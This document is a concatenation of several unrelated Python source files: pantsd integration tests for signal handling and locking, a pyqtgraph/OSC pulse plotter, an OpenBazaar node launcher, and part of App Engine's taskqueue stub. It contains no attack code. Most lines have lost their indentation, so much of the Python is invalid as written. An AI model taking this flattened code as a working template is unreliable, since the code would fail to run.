config,
)
checker.assert_started()
checker.assert_pantsd_runner_started(waiter_handle.process.pid)
creator_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make],
workdir,
config,
)
self.assert_success(creator_handle.join())
self.assert_success(waiter_handle.join())
def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param int signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
:type regexps: list of str
:param float quit_timeout: The duration of time to wait for the pailgun client to flush all of
its output and die after being killed.
"""
# TODO: This tests that pantsd processes actually die after the thin client receives the
# specified signal.
with self.pantsd_test_context() as (workdir, config, checker):
# Launch a run that will wait for a file to be created (but do not create that file).
file_to_make = os.path.join(workdir, "some_magic_file")
if quit_timeout is not None:
timeout_args = [f"--pantsd-pailgun-quit-timeout={quit_timeout}"]
else:
timeout_args = []
argv = timeout_args + [
"run",
"testprojects/src/python/coordinated_runs:waiter",
"--",
file_to_make,
]
waiter_handle = self.run_pants_with_workdir_without_waiting(argv, workdir, config)
client_pid = waiter_handle.process.pid
checker.assert_started()
checker.assert_pantsd_runner_started(client_pid)
# Get all the pantsd processes while they're still around.
pantsd_runner_processes = checker.runner_process_context.current_processes()
# This should kill the pantsd processes through the RemotePantsRunner signal handler.
os.kill(client_pid, signum)
waiter_run = waiter_handle.join()
self.assert_failure(waiter_run)
for regexp in regexps:
self.assertRegex(waiter_run.stderr_data, regexp)
time.sleep(1)
for proc in pantsd_runner_processes:
# TODO: we could be checking the return codes of the subprocesses, but psutil is currently
# limited on non-Windows hosts -- see https://psutil.readthedocs.io/en/latest/#processes.
# The pantsd processes should be dead, and they should have exited with 1.
self.assertFalse(proc.is_running())
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7554")
def test_pantsd_sigterm(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGTERM,
regexps=[
"\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.",
re.escape(
"\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n".format(
signum=signal.SIGTERM
)
),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$""",
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7572")
def test_pantsd_sigquit(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGQUIT,
regexps=[
"\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.",
re.escape(
"\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n".format(
signum=signal.SIGQUIT
)
),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$""",
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7547")
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=[
"""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user.
Interrupted by user:
Interrupted by user over pailgun client!
$"""
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7457")
def test_signal_pailgun_stream_timeout(self):
# NB: The actual timestamp has the date and time at sub-second granularity. The date is just
# used here since that is known in advance in order to assert that the timestamp is well-formed.
today = datetime.date.today().isoformat()
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=[
"""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user\\.
[^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \
"'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \
over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \
overtime seconds: [^\n]+
Interrupted by user:
Interrupted by user over pailgun client!
""".format(
today=re.escape(today)
)
],
# NB: Make the timeout very small to ensure the warning message will reliably occur in CI!
quit_timeout=1e-6,
)
@unittest.skip(
reason="This started consistently hanging on Jan. 13, 2020 for some unknown reason."
)
def test_sigint_kills_request_waiting_for_lock(self):
"""Test that, when a pailgun request is blocked waiting for another one to end, sending
SIGINT to the blocked run will kill it.
Regression test for issue: #7920
"""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a repl, so that any other run waiting to acquire the daemon lock waits forever.
first_run_handle = self.run_pants_with_workdir_without_waiting(
command=["repl", "examples/src/python/example/hello::"],
workdir=workdir,
config=config,
)
checker.assert_started()
checker.assert_running()
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=["goals"], workdir=workdir, config=config
)
# Block until the second request is waiting for the lock.
blocked = True
while blocked:
log = "\n".join(read_pantsd_log(workdir))
if "didn't aquire the lock on the first try, polling." in log:
blocked = False
                # NB: This sleep doesn't affect correctness, it's just so that we don't spend too many cycles
                # busy waiting.
time.sleep(0.1)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
# Send exit() to the repl, and exit it.
result = first_run_handle.join(stdin_data="exit()")
self.assert_success(result)
checker.assert_running()
def test_pantsd_environment_scrubbing(self):
# This pair of JVM options causes the JVM to always crash, so the command will fail if the env
# isn't stripped.
with self.pantsd_successful_run_context(
extra_config={"compile.rsc": {"jvm_options": ["-Xmx1g"]}},
extra_env={"_JAVA_OPTIONS": "-Xms2g"},
) as (pantsd_run, checker, workdir, _):
pantsd_run(["help"])
checker.assert_started()
result = pantsd_run(
["compile", "examples/src/java/org/pantsbuild/example/hello/simple"]
)
self.assert_success(result)
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(extra_env={"XXX": "¡"},) as (
pantsd_run,
checker,
workdir,
_,
):
result = pantsd_run(["help"])
checker.assert_started()
self.assert_success(result)
def test_daemon_auto_shutdown_after_first_run(self):
config = {"GLOBAL": {"shutdown_pantsd_after_run": True}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
wait_handle = self.run_pants_with_workdir_without_waiting(["list"], workdir, config,)
# TODO(#6574, #7330): We might have a new default timeout after these are resolved.
checker.assert_started(timeout=16)
pantsd_processes = checker.runner_process_context.current_processes()
pants_run = wait_handle.join()
self.assert_success(pants_run)
# Permit enough time for the process to terminate in CI
time.sleep(5)
for process in pantsd_processes:
self.assertFalse(process.is_running())
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent(
"""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
"""
)
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
with temporary_dir(".") as directory:
safe_file_dump(os.path.join(directory, "A.py"), mode="w")
safe_file_dump(os.path.join(directory, "B.py"), mode="w")
if directory.startswith("./"):
directory = directory[2:]
def list_and_verify():
result = pantsd_run(["list", f"{directory}:"])
checker.assert_started()
self.assert_success(result)
expected_targets = {f"{directory}:{target}" for target in ("A", "B")}
self.assertEqual(expected_targets, set(result.stdout_data.strip().split("\n")))
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=""))
list_and_verify()
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps="", b_deps='dependencies = [":A"],'))
list_and_verify()
def test_concurrent_overrides_pantsd(self):
"""Tests that the --concurrent flag overrides the --enable-pantsd flag, because we don't
allow concurrent runs under pantsd."""
config = {"GLOBAL": {"concurrent": True, "enable_pantsd": True}}
with self.temporary_workdir() as workdir:
pants_run = self.run_pants_with_workdir(["goals"], workdir=workdir, config=config)
self.assert_success(pants_run)
# TODO migrate to pathlib when we cut 1.18.x
pantsd_log_location = os.path.join(workdir, "pantsd", "pantsd.log")
self.assertFalse(os.path.exists(pantsd_log_location))
def test_unhandled_exceptions_only_log_exceptions_once(self):
"""Tests that the unhandled exceptions triggered by LocalPantsRunner instances don't
manifest as a PantsRunFinishedWithFailureException.
That is, that we unset the global Exiter override set by LocalPantsRunner before we try to log the exception.
This is a regression test for the most glaring case of https://github.com/pantsbuild/pants/issues/7597.
"""
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(["run", "testprojects/src/python/bad_requirements:use_badreq"])
checker.assert_running()
self.assert_failure(result)
# Assert that the desired exception has been triggered once.
self.assertIn(
"""Exception message: Could not satisfy all requirements for badreq==99.99.99:\n badreq==99.99.99""",
result.stderr_data,
)
# Assert that it has only been triggered once.
self.assertNotIn(
"During handling of the above exception, another exception occurred:",
result.stderr_data,
)
self.assertNotIn(
"pants.bin.daemon_pants_runner._PantsRunFinishedWithFailureException: Terminated with 1",
result.stderr_data,
)
def test_inner_runs_dont_deadlock(self):
"""Create a pantsd run that calls testprojects/src/python/nested_runs with the appropriate
bootstrap options to avoid restarting pantsd.
Regression test for issue https://github.com/pantsbuild/pants/issues/7881
When a run under pantsd calls pants with pantsd inside it, the inner run will time out
waiting for the outer run to end.
NB: testprojects/src/python/nested_runs assumes that the pants.toml file is in ${workdir}/pants.toml
"""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": 1,}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
result = pantsd_run(
["run", "testprojects/src/python/nested_runs", "--", workdir], expected_runs=2
)
checker.assert_started()
self.assert_success(result)
self.assertNotIn("Another pants invocation is running", result.stderr_data)
|
gl-pulse-chart.py
|
# import asyncio
from collections import deque
import sys
import time
import threading
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
import pyqtgraph.opengl as gl
import pyqtgraph as pg
from pythonosc.dispatcher import Dispatcher
from pythonosc import osc_server
trace = None
X = np.linspace(0, 100, num=100)
Y = np.sin(X*10)
Z = np.linspace(0, 0, num=100)
pts = np.vstack((X, Y, Z)).T
BUF_LEN = 100
buffer = deque([0]*BUF_LEN, BUF_LEN)
def update():
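    # Animate the line: regenerate the sine wave with a time-based phase and push the points to the GL item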
print('update')
global trace
pts[:, 1] = np.sin(X + 2*time.time())
trace.setData(pos=pts, color=(0,1,0,1), width=8)
def main():
global trace
app = QtGui.QApplication(sys.argv)
w = gl.GLViewWidget()
w.opts['distance'] = 10
w.setWindowTitle('pyqtgraph example: GLLinePlotItem')
w.setGeometry(0, 0, 800, 600)
w.resize(800, 600)
pg.setConfigOptions(antialias=True)
trace = gl.GLLinePlotItem(
pos=pts,
color=(0,1,0,1),
width=3,
antialias=True
)
w.addItem(trace)
timer = QtCore.QTimer()
timer.timeout.connect(update)
timer.start(10)
QtGui.QApplication.instance().exec_()
def pulse_handler(addr, val):
buffer.append(val)
print(val)
# plot()
def osc_boot_main():
dispatcher = Dispatcher()
dispatcher.map("/pulse", pulse_handler)
    server = osc_server.ThreadingOSCUDPServer(('0.0.0.0', 37339), dispatcher)
thread = threading.Thread(target=server.serve_forever, daemon=True)
thread.start()
if __name__ == '__main__':
osc_boot_main()
main()
|
openbazaar_daemon.py
|
import argparse
import tornado.web
from zmq.eventloop import ioloop
ioloop.install()
from transport import CryptoTransportLayer
from db_store import Obdb
from market import Market
from ws import WebSocketHandler
import logging
import logging.handlers
import signal
from threading import Thread
from twisted.internet import reactor
from util import open_default_webbrowser
from network_util import get_random_free_tcp_port
import upnp
import os
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.redirect("/html/index.html")
class OpenBazaarStaticHandler(tornado.web.StaticFileHandler):
def set_extra_headers(self, path):
self.set_header("X-Frame-Options", "DENY")
self.set_header("X-Content-Type-Options", "nosniff")
class MarketApplication(tornado.web.Application):
def __init__(self, market_ip, market_port, market_id=1,
bm_user=None, bm_pass=None, bm_port=None, seed_peers=None,
seed_mode=0, dev_mode=False, db_path='db/ob.db', disable_sqlite_crypt=False, disable_ip_update=False):
if seed_peers is None:
seed_peers = []
db = Obdb(db_path, disable_sqlite_crypt)
self.transport = CryptoTransportLayer(market_ip,
market_port,
market_id,
db,
bm_user,
bm_pass,
bm_port,
seed_mode,
dev_mode,
disable_ip_update)
self.market = Market(self.transport, db)
# UNUSED
# def post_joined():
# self.transport.dht._refreshNode()
# self.market.republish_contracts()
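        # A node started in seed mode does not bootstrap from other seed peers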
peers = seed_peers if seed_mode == 0 else []
self.transport.join_network(peers)
Thread(target=reactor.run, args=(False,)).start()
handlers = [
(r"/", MainHandler),
(r"/main", MainHandler),
(r"/html/(.*)", OpenBazaarStaticHandler, {'path': './html'}),
(r"/ws", WebSocketHandler,
dict(transport=self.transport, market_application=self, db=db))
]
# TODO: Move debug settings to configuration location
settings = dict(debug=True)
tornado.web.Application.__init__(self, handlers, **settings)
def get_transport(self):
return self.transport
def setup_upnp_port_mappings(self, http_port, p2p_port):
upnp.PortMapper.DEBUG = False
print "Setting up UPnP Port Map Entry..."
# TODO: Add some setting whether or not to use UPnP
# if Settings.get(Settings.USE_UPNP_PORT_MAPPINGS):
self.upnp_mapper = upnp.PortMapper()
# TODO: Add some setting whether or not to clean all previous port
# mappings left behind by us
# if Settings.get(Settings.CLEAN_UPNP_PORT_MAPPINGS_ON_START):
# upnp_mapper.cleanMyMappings()
# for now let's always clean mappings every time.
self.upnp_mapper.clean_my_mappings(p2p_port)
# result_http_port_mapping = self.upnp_mapper.add_port_mapping(http_port,
# http_port)
# print ("UPnP HTTP Port Map configuration done (%s -> %s) => %s" %
# (str(http_port), str(http_port), str(result_http_port_mapping)))
result_tcp_p2p_mapping = self.upnp_mapper.add_port_mapping(p2p_port,
p2p_port)
print ("UPnP TCP P2P Port Map configuration done (%s -> %s) => %s" %
(str(p2p_port), str(p2p_port), str(result_tcp_p2p_mapping)))
result_udp_p2p_mapping = self.upnp_mapper.add_port_mapping(p2p_port,
p2p_port,
'UDP')
print ("UPnP UDP P2P Port Map configuration done (%s -> %s) => %s" %
(str(p2p_port), str(p2p_port), str(result_udp_p2p_mapping)))
result = result_tcp_p2p_mapping and result_udp_p2p_mapping
if not result:
print "Warning: UPnP was not setup correctly. Try doing a port forward on %s and start the node again with -j" % p2p_port
return result
def cleanup_upnp_port_mapping(self):
try:
if self.upnp_mapper is not None:
print "Cleaning UPnP Port Mapping -> ", \
self.upnp_mapper.clean_my_mappings(self.transport.port)
except AttributeError:
print "[openbazaar] MarketApplication.clean_upnp_port_mapping() failed!"
def shutdown(self, x=None, y=None):
print "MarketApplication.shutdown!"
locallogger = logging.getLogger(
'[%s] %s' % (self.market.market_id, 'root')
)
locallogger.info("Received TERMINATE, exiting...")
# application.get_transport().broadcast_goodbye()
self.cleanup_upnp_port_mapping()
tornado.ioloop.IOLoop.instance().stop()
self.transport.shutdown()
os._exit(0)
def start_node(my_market_ip,
my_market_port,
http_ip,
http_port,
log_file,
market_id,
bm_user=None,
bm_pass=None,
bm_port=None,
seed_peers=None,
seed_mode=0,
dev_mode=False,
log_level=None,
database='db/ob.db',
disable_upnp=False,
disable_open_browser=False,
disable_sqlite_crypt=False,
disable_ip_update=False):
if seed_peers is None:
seed_peers = []
try:
logging.basicConfig(
level=int(log_level),
format=u'%(asctime)s - %(name)s - %(levelname)s - %(message)s',
filename=log_file
)
logging._defaultFormatter = logging.Formatter(u'%(message)s')
locallogger = logging.getLogger('[%s] %s' % (market_id, 'root'))
handler = logging.handlers.RotatingFileHandler(
log_file,
encoding='utf-8',
maxBytes=50000000,
backupCount=0
)
locallogger.addHandler(handler)
except Exception as e:
print "Could not setup logger, continuing: ", e.message
application = MarketApplication(my_market_ip,
my_market_port,
market_id,
bm_user,
bm_pass,
bm_port,
seed_peers,
seed_mode,
dev_mode,
database,
disable_sqlite_crypt,
disable_ip_update)
error = True
p2p_port = my_market_port
if http_port == -1:
http_port = get_random_free_tcp_port(8889, 8988)
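    # Keep trying successive ports until listen() succeeds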
while error:
try:
application.listen(http_port, http_ip)
error = False
except:
http_port += 1
if not disable_upnp:
application.setup_upnp_port_mappings(http_port, p2p_port)
else:
print "Disabling upnp setup"
locallogger.info("Started OpenBazaar Web App at http://%s:%s" %
(http_ip, http_port))
print "Started OpenBazaar Web App at http://%s:%s" % (http_ip, http_port)
print "Use ./stop.sh to stop"
if not disable_open_browser:
open_default_webbrowser('http://%s:%s' % (http_ip, http_port))
try:
signal.signal(signal.SIGTERM, application.shutdown)
except ValueError:
# not the main thread
pass
if not tornado.ioloop.IOLoop.instance():
ioloop.install()
else:
try:
tornado.ioloop.IOLoop.instance().start()
except Exception as e:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("my_market_ip")
parser.add_argument("-p", "--my_market_port",
type=int, default=12345)
# default secure behavior is to keep HTTP port private
parser.add_argument("-k", "--http_ip", default="127.0.0.1")
parser.add_argument("-q", "--http_port", type=int, default=-1)
parser.add_argument("-l", "--log_file",
default='logs/production.log')
parser.add_argument("-u", "--market_id",
default=1)
parser.add_argument("-S", "--seed_peers",
nargs='*', default=[])
parser.add_argument("-s", "--seed_mode",
default=0)
parser.add_argument("-d", "--dev_mode",
action='store_true')
parser.add_argument("--database",
default='db/ob.db', help="Database filename")
parser.add_argument("--bmuser",
default='username', help="Bitmessage instance user")
parser.add_argument("--bmpass",
default='password', help="Bitmessage instance pass")
parser.add_argument("--bmport",
default='8442', help="Bitmessage instance RPC port")
parser.add_argument("--log_level",
default=10, help="Numeric value for logging level")
parser.add_argument("--disable_upnp",
action='store_true')
parser.add_argument("--disable_open_browser",
action='store_true',
default=False)
parser.add_argument("--disable_sqlite_crypt",
action='store_true',
default=False)
parser.add_argument("--disable-ip-update",
action='store_true',
default=False)
args = parser.parse_args()
start_node(args.my_market_ip,
args.my_market_port,
args.http_ip,
args.http_port,
args.log_file,
args.market_id,
args.bmuser,
args.bmpass,
args.bmport,
args.seed_peers,
args.seed_mode,
args.dev_mode,
args.log_level,
args.database,
args.disable_upnp,
args.disable_open_browser,
args.disable_sqlite_crypt,
args.disable_ip_update)
# Run this if executed directly
if __name__ == "__main__":
main()
|
taskqueue_stub.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Stub version of the Task Queue API.
This stub stores tasks and runs them via dev_appserver's AddEvent capability.
It also validates the tasks by checking their queue name against the queue.yaml.
As well as implementing Task Queue API functions, the stub exposes various other
functions that are used by the dev_appserver's admin console to display the
application's queues and tasks.
"""
from __future__ import with_statement
__all__ = []
import base64
import bisect
import calendar
import cgi
import datetime
import httplib
import logging
import os
import random
import socket
import string
import threading
import time
import taskqueue_service_pb
import taskqueue
from google.appengine.api import api_base_pb
from google.appengine.api import apiproxy_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import queueinfo
from google.appengine.runtime import apiproxy_errors
DEFAULT_RATE = '5.00/s'
DEFAULT_RATE_FLOAT = 5.0
DEFAULT_BUCKET_SIZE = 5
MAX_ETA = datetime.timedelta(days=30)
MAX_PULL_TASK_SIZE_BYTES = 2 ** 20
MAX_PUSH_TASK_SIZE_BYTES = 100 * (2 ** 10)
MAX_TASK_SIZE = MAX_PUSH_TASK_SIZE_BYTES
MAX_REQUEST_SIZE = 32 << 20
BUILT_IN_HEADERS = set(['x-appengine-queuename',
'x-appengine-taskname',
'x-appengine-taskretrycount',
'x-appengine-development-payload',
'content-length'])
DEFAULT_QUEUE_NAME = 'default'
INF = 1e500
QUEUE_MODE = taskqueue_service_pb.TaskQueueMode
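# Maps automatic queue names to their (bucket_refill_per_second,
# bucket_capacity, user_specified_rate) constructor arguments (see _Queue).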
AUTOMATIC_QUEUES = {
DEFAULT_QUEUE_NAME: (0.2, DEFAULT_BUCKET_SIZE, DEFAULT_RATE),
'__cron': (1, 1, '1/s')}
def _GetAppId(request):
"""Returns the app id to use for the given request.
Args:
request: A protocol buffer that has an app_id field.
Returns:
A string containing the app id or None if no app id was specified.
"""
if request.has_app_id():
return request.app_id()
else:
return None
def _SecToUsec(t):
"""Converts a time in seconds since the epoch to usec since the epoch.
Args:
t: Time in seconds since the unix epoch
Returns:
An integer containing the number of usec since the unix epoch.
"""
return int(t * 1e6)
def _UsecToSec(t):
"""Converts a time in usec since the epoch to seconds since the epoch.
Args:
t: Time in usec since the unix epoch
Returns:
A float containing the number of seconds since the unix epoch.
"""
return t / 1e6
def _FormatEta(eta_usec):
"""Formats a task ETA as a date string in UTC."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
return eta.strftime('%Y/%m/%d %H:%M:%S')
def _TruncDelta(timedelta):
"""Strips the microseconds field from a timedelta.
Args:
timedelta: a datetime.timedelta.
Returns:
    A datetime.timedelta with the microseconds field zeroed out.
"""
return datetime.timedelta(days=timedelta.days, seconds=timedelta.seconds)
def _EtaDelta(eta_usec, now):
"""Formats a task ETA as a relative time string."""
eta = datetime.datetime.utcfromtimestamp(_UsecToSec(eta_usec))
if eta > now:
return '%s from now' % _TruncDelta(eta - now)
else:
return '%s ago' % _TruncDelta(now - eta)
def QueryTasksResponseToDict(queue_name, task_response, now):
"""Converts a TaskQueueQueryTasksResponse_Task protobuf group into a dict.
Args:
queue_name: The name of the queue this task came from.
task_response: An instance of TaskQueueQueryTasksResponse_Task.
now: A datetime.datetime object containing the current time in UTC.
Returns:
A dict containing the fields used by the dev appserver's admin console.
Raises:
ValueError: A task response contains an unknown HTTP method type.
"""
task = {}
task['name'] = task_response.task_name()
task['queue_name'] = queue_name
task['url'] = task_response.url()
method = task_response.method()
if method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.GET:
task['method'] = 'GET'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.POST:
task['method'] = 'POST'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.HEAD:
task['method'] = 'HEAD'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.PUT:
task['method'] = 'PUT'
elif method == taskqueue_service_pb.TaskQueueQueryTasksResponse_Task.DELETE:
task['method'] = 'DELETE'
else:
raise ValueError('Unexpected method: %d' % method)
task['eta'] = _FormatEta(task_response.eta_usec())
task['eta_usec'] = task_response.eta_usec()
task['eta_delta'] = _EtaDelta(task_response.eta_usec(), now)
task['body'] = base64.b64encode(task_response.body())
headers = [(header.key(), header.value())
for header in task_response.header_list()
if header.key().lower() not in BUILT_IN_HEADERS]
headers.append(('X-AppEngine-QueueName', queue_name))
headers.append(('X-AppEngine-TaskName', task_response.task_name()))
headers.append(('X-AppEngine-TaskRetryCount',
str(task_response.retry_count())))
headers.append(('X-AppEngine-Development-Payload', '1'))
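  # Note: this length describes the base64-encoded body stored above, which
  # is what the dev_appserver admin console displays.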
headers.append(('Content-Length', str(len(task['body']))))
if 'content-type' not in frozenset(key.lower() for key, _ in headers):
headers.append(('Content-Type', 'application/octet-stream'))
task['headers'] = headers
return task
class _Group(object):
"""A taskqueue group.
This class contains all of the queues for an application.
"""
def __init__(self, queue_yaml_parser=None, app_id=None,
_all_queues_valid=False, _update_newest_eta=None,
_testing_validate_state=False):
"""Constructor.
Args:
queue_yaml_parser: A function that takes no parameters and returns the
parsed results of the queue.yaml file. If this queue is not based on a
queue.yaml file use None.
app_id: The app id this Group is representing or None if it is the
currently running application.
_all_queues_valid: Automatically generate queues on first access.
_update_newest_eta: Callable for automatically executing tasks.
Takes the ETA of the task in seconds since the epoch, the queue_name
and a task name. May be None if automatic task running is disabled.
_testing_validate_state: Should this _Group and all of its _Queues
validate their state after each operation? This should only be used
during testing of the taskqueue_stub.
"""
self._queues = {}
self._queue_yaml_parser = queue_yaml_parser
self._all_queues_valid = _all_queues_valid
self._next_task_id = 1
self._app_id = app_id
if _update_newest_eta is None:
self._update_newest_eta = lambda x: None
else:
self._update_newest_eta = _update_newest_eta
self._testing_validate_state = _testing_validate_state
def GetQueuesAsDicts(self):
"""Gets all the applications's queues.
Returns:
A list of dictionaries, where each dictionary contains one queue's
attributes. E.g.:
[{'name': 'some-queue',
'max_rate': '1/s',
'bucket_size': 5,
'oldest_task': '2009/02/02 05:37:42',
'eta_delta': '0:00:06.342511 ago',
'tasks_in_queue': 12,
'acl': ['user1@gmail.com']}, ...]
The list of queues always includes the default queue.
"""
self._ReloadQueuesFromYaml()
now = datetime.datetime.utcnow()
queues = []
for queue_name, queue in sorted(self._queues.items()):
queue_dict = {}
queues.append(queue_dict)
queue_dict['name'] = queue_name
queue_dict['bucket_size'] = queue.bucket_capacity
if queue.user_specified_rate is not None:
queue_dict['max_rate'] = queue.user_specified_rate
else:
queue_dict['max_rate'] = ''
if queue.queue_mode == QUEUE_MODE.PULL:
queue_dict['mode'] = 'pull'
else:
queue_dict['mode'] = 'push'
queue_dict['acl'] = queue.acl
if queue.Oldest():
queue_dict['oldest_task'] = _FormatEta(queue.Oldest())
queue_dict['eta_delta'] = _EtaDelta(queue.Oldest(), now)
else:
queue_dict['oldest_task'] = ''
queue_dict['eta_delta'] = ''
queue_dict['tasks_in_queue'] = queue.Count()
return queues
def HasQueue(self, queue_name):
"""Check if the specified queue_name references a valid queue.
Args:
queue_name: The name of the queue to check.
Returns:
True if the queue exists, False otherwise.
"""
self._ReloadQueuesFromYaml()
return queue_name in self._queues and (
self._queues[queue_name] is not None)
def GetQueue(self, queue_name):
"""Gets the _Queue instance for the specified queue.
Args:
queue_name: The name of the queue to fetch.
Returns:
The _Queue instance for the specified queue.
Raises:
KeyError if the queue does not exist.
"""
self._ReloadQueuesFromYaml()
return self._queues[queue_name]
def GetNextPushTask(self):
"""Finds the task with the lowest eta.
Returns:
A tuple containing the queue and task instance for the task with the
lowest eta, or (None, None) if there are no tasks.
"""
min_eta = INF
result = None, None
for queue in self._queues.itervalues():
if queue.queue_mode == QUEUE_MODE.PULL:
continue
task = queue.OldestTask()
if not task:
continue
if task.eta_usec() < min_eta:
result = queue, task
min_eta = task.eta_usec()
return result
def _ConstructQueue(self, queue_name, *args, **kwargs):
if '_testing_validate_state' in kwargs:
      raise TypeError(
          '_testing_validate_state should not be passed to _ConstructQueue')
kwargs['_testing_validate_state'] = self._testing_validate_state
self._queues[queue_name] = _Queue(queue_name, *args, **kwargs)
def _ConstructAutomaticQueue(self, queue_name):
if queue_name in AUTOMATIC_QUEUES:
self._ConstructQueue(queue_name, *AUTOMATIC_QUEUES[queue_name])
else:
assert self._all_queues_valid
self._ConstructQueue(queue_name)
def _ReloadQueuesFromYaml(self):
"""Update the queue map with the contents of the queue.yaml file.
This function will remove queues that no longer exist in the queue.yaml
file.
If no queue yaml parser has been defined, this function is a no-op.
"""
if not self._queue_yaml_parser:
return
queue_info = self._queue_yaml_parser()
if queue_info and queue_info.queue:
queues = queue_info.queue
else:
queues = []
old_queues = set(self._queues)
new_queues = set()
for entry in queues:
queue_name = entry.name
new_queues.add(queue_name)
if entry.bucket_size:
bucket_size = entry.bucket_size
else:
bucket_size = DEFAULT_BUCKET_SIZE
if entry.mode == 'pull':
mode = QUEUE_MODE.PULL
if entry.rate is not None:
logging.warning(
'Refill rate must not be specified for pull-based queue. '
'Please check queue.yaml file.')
else:
mode = QUEUE_MODE.PUSH
if entry.rate is None:
logging.warning(
'Refill rate must be specified for push-based queue. '
'Please check queue.yaml file.')
max_rate = entry.rate
if entry.acl is not None:
acl = taskqueue_service_pb.TaskQueueAcl()
for acl_entry in entry.acl:
acl.add_user_email(acl_entry.user_email)
else:
acl = None
if self._queues.get(queue_name) is None:
self._ConstructQueue(queue_name, bucket_capacity=bucket_size,
user_specified_rate=max_rate, queue_mode=mode,
acl=acl)
else:
queue = self._queues[queue_name]
queue.bucket_size = bucket_size
queue.user_specified_rate = max_rate
queue.acl = acl
queue.queue_mode = mode
if mode == QUEUE_MODE.PUSH:
eta = queue.Oldest()
if eta:
self._update_newest_eta(_UsecToSec(eta))
if DEFAULT_QUEUE_NAME not in self._queues:
self._ConstructAutomaticQueue(DEFAULT_QUEUE_NAME)
new_queues.add(DEFAULT_QUEUE_NAME)
if not self._all_queues_valid:
for queue_name in old_queues-new_queues:
del self._queues[queue_name]
def _ValidateQueueName(self, queue_name):
"""Tests if the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
      queue_name: The name of the queue to check.
Returns:
If there are no problems, returns TaskQueueServiceError.OK. Otherwise
returns the correct constant from TaskQueueServiceError.
"""
if not queue_name:
return taskqueue_service_pb.TaskQueueServiceError.INVALID_QUEUE_NAME
elif queue_name not in self._queues:
if queue_name in AUTOMATIC_QUEUES or self._all_queues_valid:
self._ConstructAutomaticQueue(queue_name)
else:
return taskqueue_service_pb.TaskQueueServiceError.UNKNOWN_QUEUE
elif self._queues[queue_name] is None:
return taskqueue_service_pb.TaskQueueServiceError.TOMBSTONED_QUEUE
return taskqueue_service_pb.TaskQueueServiceError.OK
def _CheckQueueForRpc(self, queue_name):
"""Ensures the specified queue exists and creates it if needed.
This function replicates the behaviour of the taskqueue service by
automatically creating the 'automatic' queues when they are first accessed.
Args:
      queue_name: The name of the queue to check.
Raises:
ApplicationError: If the queue name is invalid, tombstoned or does not
exist.
"""
self._ReloadQueuesFromYaml()
